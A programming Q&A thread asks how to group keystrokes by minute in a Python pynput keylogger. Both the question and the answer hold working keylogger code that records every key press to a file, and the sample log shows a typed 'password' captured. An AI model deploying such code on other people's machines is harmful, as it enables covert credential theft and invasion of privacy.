# How to combine output in single line in a key-logger program?

Tags: python, keystroke, keylogger, pynput

```
from pynput.keyboard import Key, Listener
import logging

log_dir = "C:/Users/noswear/Desktop/Mail/"

logging.basicConfig(filename = (log_dir + "key_log.txt"),level = logging.DEBUG, format  = '%(asctime)s:%(message)s')

def on_press(key):
    logging.info(str(key))

with Listener(on_press = on_press) as listener:
    listener.join()
```

The above program gives output like this:

```
2018-05-07 20:54:56,020:'m'
2018-05-07 20:54:57,010:Key.backspace
2018-05-07 20:55:00,192:'p'
2018-05-07 20:55:00,366:'a'
2018-05-07 20:55:00,485:'s'
2018-05-07 20:55:00,695:'s'
2018-05-07 20:55:01,432:'w'
2018-05-07 20:55:01,653:'o'
2018-05-07 20:55:01,857:'r'
2018-05-07 20:55:02,056:'d'
```

How can I club together by minutes, where all stroke in a minute is stored in a single line?

Something like this

```
2018-05-07 20:54:mKey.backspace
2018-05-17 20:55:password
```

Comment: maybe define a string before the "def on_press", concatenate the string on the on_press, then call the join after a minute? define a timer, call it out?

Comment: maybe you can solve this by concatenating all the letters, separating them when a space or special chars appear

Answer (score 1):

IMHO: It's a bit difficult to determine by time, and ugly to read by words, but think that if you want to process it later, procedural by words will be easier. It's just a suggestion!

```
from pynput.keyboard import Key, Listener
import logging

chain = ""

logging.basicConfig(filename = ("key_log.txt"),level = logging.DEBUG,     format  = '%(asctime)s:%(message)s')

def on_press(key):
    global chain
    k = str(key)
    if(k[0:2] == "u'"): # using the pattern that pynput uses we can determine when a letter is pressed
        chain += k[2:3]
    else:
        logging.info(str(chain) + " " + k)
        chain = "" # set the chain again to empty


with Listener(on_press = on_press) as listener:
    listener.join()
```

Comment: Thanks for the answer. Never thought it would be this difficult. Now I am just calling the file with the log in a different program and manipulating the string there for the time being.

Comment: The problem is not that it is difficult, but that you may have a record with many words and special keys, and another one with only a few letters or special keys... it will be difficult when you want to read it with a program, or when you want to create one to go through it.  Greetings!